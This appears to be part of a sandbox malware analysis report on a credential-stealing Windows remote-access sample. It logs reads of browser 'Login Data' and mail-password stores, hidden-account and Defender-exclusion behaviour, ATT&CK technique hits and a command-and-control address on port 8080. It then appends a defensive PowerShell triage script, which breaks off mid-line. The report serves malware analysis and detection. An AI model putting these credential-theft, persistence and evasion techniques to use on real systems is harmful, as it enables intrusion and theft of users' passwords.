          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00408024 cpuid
          Source: C:\ProgramData\images.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0040826B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F494E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

          Stealing of Sensitive Information

          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\ProgramData\images.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\ProgramData\images.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: POP3 Password
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: SMTP Password
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: IMAP Password
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: \Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: \Chromium\User Data\Default\Login Data
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe PID: 6324, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: images.exe PID: 6516, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F652D0 sqlite3_transfer_bindings,
MITRE ATT&CK matrix (the 14-column grid was flattened by extraction). Listed below, per tactic, are only the techniques that carry a hit badge in this analysis; the numbers in parentheses are the badge counts exactly as they appear on the matrix cell. The unmarked cells, which are simply the remaining technique names of the standard matrix, are not repeated.

Initial Access: no techniques marked
Execution: Windows Management Instrumentation (2 1); Scripting (1 1); Native API (1 2); Service Execution (2)
Persistence: LSASS Driver (1); DLL Side-Loading (1); Create Account (1); Windows Service (2 1); Registry Run Keys / Startup Folder (2)
Privilege Escalation: LSASS Driver (1); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (2 1); Process Injection (4 2 2); Registry Run Keys / Startup Folder (2)
Defense Evasion: Disable or Modify Tools (1 1); Deobfuscate/Decode Files or Information (1); Scripting (1 1); Obfuscated Files or Information (2 1); Software Packing (1 1); DLL Side-Loading (1); Masquerading (1 3); Virtualization/Sandbox Evasion (4 1); Access Token Manipulation (1); Process Injection (4 2 2); Hidden Users (2); NTFS File Attributes (1)
Credential Access: OS Credential Dumping (3); Input Capture (1 2 1); Credentials In Files (1)
Discovery: System Time Discovery (1); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (3 9); Security Software Discovery (1 4 1); Virtualization/Sandbox Evasion (4 1); Process Discovery (3); Application Window Discovery (1)
Lateral Movement: no techniques marked
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (1 2 1)
Exfiltration: no techniques marked
Command and Control: Ingress Tool Transfer (2 1); Encrypted Channel (2); Non-Standard Port (1); Application Layer Protocol (1)
Network Effects: no techniques marked
Remote Service Effects: no techniques marked
Impact: Endpoint Denial of Service (1)
Behavior Graph ID: 631792   Sample: SecuriteInfo.com.Gen.Varian...   Start date: 22/05/2022   Architecture: WINDOWS   Score: 100

Root signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures

Process tree (node numbers as in the graph):

• SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe (8), started from root
  Dropped: C:\ProgramData\images.exe (PE32); C:\ProgramData:ApplicationData (PE32); C:\Users\user\AppData\...\programs.bat:start (ASCII); 2 other malicious files
  Signatures: Creates files in alternative data streams (ADS); Drops script or batch files to the startup folder; Contains functionality to inject threads in other processes; 5 other signatures
  • images.exe (18)
    Network: TCP to 23.227.202.157 port 8080 (local port 49740), HVC-AS, United States
    Dropped: C:\Program Files\Microsoft DN1\sqlmap.dll (PE32+)
    Signatures: Multi AV Scanner detection for dropped file; Hides user accounts; Tries to steal Mail credentials (via file / registry access); 7 other signatures
    • cmd.exe (29)
      • conhost.exe (35)
    • powershell.exe (31)
      • conhost.exe (37)
  • powershell.exe (23)
    • conhost.exe (33)
• cmd.exe (12), started from root
  • WMIC.exe (25): Creates processes via WMI
  • conhost.exe (27)
• tsusbhub.sys (14), started from root
• 4 other processes (16), started from root
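Turning the graph above into a host check, as an added example that is not part of the Joe Sandbox report and not code from the sample: a PowerShell triage function for the artifacts this report lists (the dropped images.exe and sqlmap.dll with the SHA-256 values from the dropped-files tables, the alternate data streams on C:\ProgramData and on the startup-folder batch file, the 26-byte "[ZoneTransfer] ZoneId=0" file whose format is that of a Zone.Identifier stream, the hidden account, the Defender exclusion, the RDP Wrapper configuration among the dropped files, and the 23.227.202.157:8080 connection). It assumes an elevated PowerShell 5.1 or later session on the suspect host. The registry locations it inspects for hidden accounts and for the TermService ServiceDll are standard Windows locations and are my assumption about where this sample's "Hides user accounts" and RDP Wrapper behaviour would land; the report names the behaviour but not the keys.

```powershell
# Added triage script, not part of the Joe Sandbox report or of the sample.
# Assumes an elevated PowerShell 5.1+ session on the suspect Windows host.
function Invoke-AveMariaTriage {
    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Dropped files the report names, checked against its SHA-256 values.
    $known = @{
        '9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF' = 'UPX-packed loader (same hash as the submitted sample)'
        '798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4' = 'sqlmap.dll, x64 DLL flagged PUA/Remoteadmin'
    }
    foreach ($p in 'C:\ProgramData\images.exe', 'C:\Program Files\Microsoft DN1\sqlmap.dll') {
        if (Test-Path -LiteralPath $p) {
            $h   = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
            $tag = if ($known.ContainsKey($h)) { $known[$h] } else { 'hash not in report, inspect' }
            $findings.Add("FILE      $p  SHA256=$h  [$tag]")
        }
    }

    # 2. Alternate data streams. The report shows a PE written to
    #    C:\ProgramData:ApplicationData and a 'start' stream on the startup-folder
    #    batch file. Every profile is checked because an elevated session's
    #    $env:APPDATA is the administrator's, not the victim's. A Zone.Identifier
    #    with ZoneId=0 is reported too: it marks the file as local origin, so no
    #    Mark-of-the-Web prompt is shown.
    $startupDirs = Get-ChildItem -LiteralPath 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' }
    $targets = @('C:\ProgramData', 'C:\ProgramData\images.exe')
    foreach ($d in $startupDirs) {
        $targets += @(Get-ChildItem -LiteralPath $d -File -ErrorAction SilentlyContinue | ForEach-Object FullName)
    }
    foreach ($t in $targets) {
        foreach ($s in @(Get-Item -LiteralPath $t -Stream * -ErrorAction SilentlyContinue)) {
            if ($s.Stream -eq ':$DATA') { continue }          # default stream, not an ADS
            if ($s.Stream -eq 'Zone.Identifier') {
                $zone = Get-Content -LiteralPath $t -Stream Zone.Identifier -Raw -ErrorAction SilentlyContinue
                if ($zone -notmatch 'ZoneId=0') { continue }
                $findings.Add("ADS       ${t}:Zone.Identifier  ZoneId=0 (Mark-of-the-Web cleared)")
                continue
            }
            $findings.Add("ADS       ${t}:$($s.Stream)  $($s.Length) bytes")
        }
        if ($t -like '*\Startup\*.bat') {
            $first = Get-Content -LiteralPath $t -TotalCount 1 -ErrorAction SilentlyContinue
            $findings.Add("STARTUP   $t  first line: $first")
        }
    }

    # 3. Accounts hidden from the logon screen (the report's "Hides user accounts").
    #    Assumed mechanism: a DWORD value of 0 under Winlogon\SpecialAccounts\UserList.
    $ul = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    if (Test-Path -LiteralPath $ul) {
        $vals = Get-ItemProperty -LiteralPath $ul
        foreach ($name in (Get-Item -LiteralPath $ul).Property) {
            $findings.Add("HIDDEN    user '$name' = $($vals.$name)")
        }
    }

    # 4. RDP Wrapper style hooking. images.exe drops an RDP Wrapper configuration;
    #    RDP Wrapper works by replacing the TermService ServiceDll (assumption about
    #    the mechanism; the default is %SystemRoot%\System32\termsrv.dll).
    $ts = Get-ItemProperty -LiteralPath 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService\Parameters' -ErrorAction SilentlyContinue
    if ($ts -and $ts.ServiceDll -notmatch '\\System32\\termsrv\.dll$') {
        $findings.Add("RDP       TermService ServiceDll = $($ts.ServiceDll)")
    }
    Get-ChildItem -LiteralPath 'C:\Program Files\Microsoft DN1' -File -Recurse -ErrorAction SilentlyContinue |
        Select-String -Pattern 'RDP Wrapper Library' -List -ErrorAction SilentlyContinue |
        ForEach-Object { $findings.Add("RDP       RDP Wrapper config: $($_.Path)") }

    # 5. Defender exclusions (the report's "Adds a directory exclusion to Windows Defender").
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    foreach ($e in @($pref.ExclusionPath)) {
        if ($e) { $findings.Add("DEFENDER  exclusion path: $e") }
    }

    # 6. Live connections to the C2 address seen in the sandbox (remote port 8080).
    Get-NetTCPConnection -RemoteAddress '23.227.202.157' -ErrorAction SilentlyContinue |
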